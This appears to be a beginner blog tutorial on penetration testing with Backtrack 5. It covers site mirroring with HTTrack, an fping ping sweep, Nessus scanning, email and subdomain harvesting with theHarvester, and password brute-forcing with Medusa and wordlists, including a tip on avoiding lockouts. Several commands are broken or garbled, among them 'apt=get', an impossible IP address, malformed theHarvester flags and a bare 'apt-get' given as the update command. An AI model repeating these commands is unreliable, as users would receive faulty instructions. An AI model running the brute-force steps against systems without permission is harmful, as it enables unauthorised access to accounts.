When it comes to learning how to perform penetration testing with Backtrack 5, you probably know how tough it looks. Hopefully, with this Backtrack 5 Tutorial, we’re going to change that for you. What if you don’t even know what penetration testing is? Well, before we get started, we’re going to tell you. In a nutshell, penetration testing is a way for an individual (or company) to test the security of a network. It sounds a lot like hacking, doesn’t it? Don’t worry! It’s perfectly legal as long as you are using it with good intentions such as exploiting your own network and using the tool to make your network more secure.
Believe us when we say this, there is a big demand for this. After all, if you can get into a company’s network then that means that someone else probably can to. You’ll also hear of penetration testing referred to as ethical hacking or white hat hacking. Either way, it’s all the same. In the Backtrack 5 Tutorial below, we’re going to walk you through the 4 basic steps of penetration testing and teach you what you need to know in order to perform it yourself. Are you ready to get started? Great! Scroll down.
Step 1 – Surveillance
Before we get going with the actual penetration testing, we want to install a free program called “HTTrack” via the Backtrack 5 console. To do this, open Backtrack 5 and enter “sudo apt=get install httrack” and get ready for the next step. Once that’s done, go ahead and type in “httrack” into the console to pull it up. Now, in case you’re wondering, this program will allow us to index all of the pages on a given site before we start the actual penetration testing process. This means that you won’t have to be digging around through some site live and wasting precious time. You also don’t assume the risk of getting kicked off of the server before you get what you need. If that were to happen, you’d need to install this tool anyways so it’s best to play it safe and use it from the beginning.
Next, you will give your path a name (you can leave it blank if you want) and you will enter a website to copy. Once you do that and hit enter, you’ll be given a list of options. To copy the entire website, you’ll simply hit “1” on your keyboard. Give it a few minutes and you’ll have duplicates of the entire site’s contents downloaded.
There are also tools available for download that will let you repeat this process but for sub-domains and emails. We aren’t going to cover that here in this lesson but that’s because it is more of a convenience and isn’t completely necessary. With that being said, it’s about time we move on to Step 2!
Step 2 – Scan The Site
Step 2 forgetting hacking practice is also our favorite step. It’s the actual scanning process and quite frankly, it’s the least complicated step (or one of them). So, the first way to scan the site in question is with a Ping Sweep. To do this, you’ll want to enter the following code into the terminal and wait for the results.
The code: fping –a –g 18.104.22.168 322.214.171.124>hosts.txt
Now, in that code, you’ll notice something strange. There are random numbers in there. Okay, those are sample IP addresses. They aren’t real IP addresses to real sites so you’ll want to replace those with the IP address of a real site (the site you are performing penetration testing on). Essentially, what the Ping Sweet does is it sweeps and scans all the IP addresses from IP address A to IP address B. Make sense?
Once you have these results, we recommend running a vulnerability scan. To do this, enter this code:
“root@bt:~# apt-get install nessus”
Once you have this installed, you can run it by doing the following: Click Applications, Backtrack, Vulnerability Assessment, Vulnerability Scanner, Nessus, and finally, Nessus Start. Then, you wait.
Before you move on to Step 3, we have an additional recommendation that isn’t necessary but it will help. You can easily catalog both email addresses and sub-domains that are associated with the website in question as well with a simple, easy to use Python script called “The Harvester.” To get this on your Backtrack 5 system, you will simply need to type in the following code into your console to get going:
root@bt:~# cd /pentest/enumeration/theharvester
root@bt:~# ./the Harvester.py –d (your site here) -1 10 –b google.com
Now, you see where we entered Google’s web url? You can literally use any search engine that you want there whether it’s Yahoo, Bing, or MSN. Basically what this function does is searches a public resource (a search engine) for emails and sub-domains associated with the address you enter in the code above. Again, this isn’t necessary but it will give you additional information on the site and additional resources that will come in handy when it comes time to start the exploitation process. Now, ready to move on?
Step 3 – Exploit The Site In Question
Now we’re at the stage in the game where we’re going to attempt to exploit the site which is probably what most of you have been waiting for. In other words, it’s crunch time! So, the first thing that you need to do is ensure that you have Medusa installed. Backtrack 5 comes with Medusa pre-installed but just in case it isn’t, here is what you can do. Open your console and type “apt-get update.” Once you’ve done that then you’ll also want to type in “apt-get install medusa.” That should take care of it for you.
Now, before we move on, keep one thing in mind. Some networks will lock you out if you have too many guesses as to what the password is. In order to better your chances and hopefully avoid this, type in the following: /pentest/passwords/wordlists. This is basically a word list that you can use when you run the Medusa program to guess passwords. To get started, enter the code listed below to exploit the server.
“medusa –h target ip –u username –P path to password dictionary –M service to attack”
To make better sense of what you’re reading above, we’re going to explain it and break it down for you. The –h is used to target the IP of the site or its host (many people use Shared IP addresses now).
The –u is for usernames that will be used in attempts to log in. The –P is going to specify an entire list of possible passwords and the –M is going to be used to target a specific service that will be attacked. While this may sound pretty complicated to those of you who have never used Backtrack 5 and are coming to this tutorial with no experience whatsoever, it really isn’t that complicated. It will take a little practice but after a few attempts (hopefully you’re using your own website), you’ll get it down. Now, once you’ve messed with this some and have at least got familiar with it, move on to Step 4.
Step 4 – Compile Results
Now that you’ve went through the first 3 basic steps from Surveillance to Exploiting the Site, you’re ready to start compiling basic information and results. Were you able to access the server or website in question? Were you locked out because of too many password attempts? Were you able to get around that? These are all questions that you should ask yourself when using Backtrack 5. As mentioned above, this will take a little practice and some getting used to but it’s not a hard piece of software to master.
Best of all, it’s a very valuable piece of software that could potentially save you or your business a lot of money later on down the road. If you can access your own website or server with Backtrack 5 then that means you’re at high risk of being hacked. If you store credit card numbers or secretive information on your site, you definitely don’t want this to happen. While this is only a basic Backtrack 5 tutorial that just outlines the bare essentials of using the software, there is still a lot to learn. Whether you decide to seek outquality backtrack 5 lesson or learn yourself, you’ll find it to be a very rewarding, challenging, and technical experience. On top of that, you’ll also learn logical security practices that will enable you to keep your sites and networks safe from hackers. Now, what are you waiting for? It’s time to start mastering Backtrack 5 today!
We know that we said we’d let you go but we wanted to give you a bonus step that you can use in order to ensure that you have the best Backtrack 5 experience possible. Not manypaid Backtrack 5 tutorials are going to give you this information because it’s not something that many people think is that serious but we definitely do. What is it? Well, we recommend regularly updating Backtrack 5. Sometimes, you may find that you literally have to update your software multiple times a week but it’s well worth it. It’s also very easy. All you need to do is type in the following command: apt-get. From there, you’ll always have the latest updates to keep you in the know so you can always learn new wireless hacking and security info. Yep, that’s it! If that doesn’t work then you can always try a more in depth approach by typing the lengthy command below.
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
This will ensure that you have all the necessary updates and you’re ready to go the next time you use the software. Many people overlook this step but just like we said above, we think it’s a pretty serious step to take. The updates are absolutely free and there’s literally no good excuse not to take advantage of them. They could come in handy later on down the road and you never know what new updates that will be coming out for Backtrack 5. Since the updates are based on Ubuntu updates, you’ll find that they do come out pretty often. As mentioned above, you may want to do this multiple times a week but for the most part, these updates are quick.
So, with that being said, put in that command before each session of Backtrack 5. This may not get you the updates as soon as they come out but it will ensure that you’re up to date before you use the software. Sound simple enough? That’s because it most definitely is! Now, all that’s left to do is polish your skills, keep your software updated, and go get to work!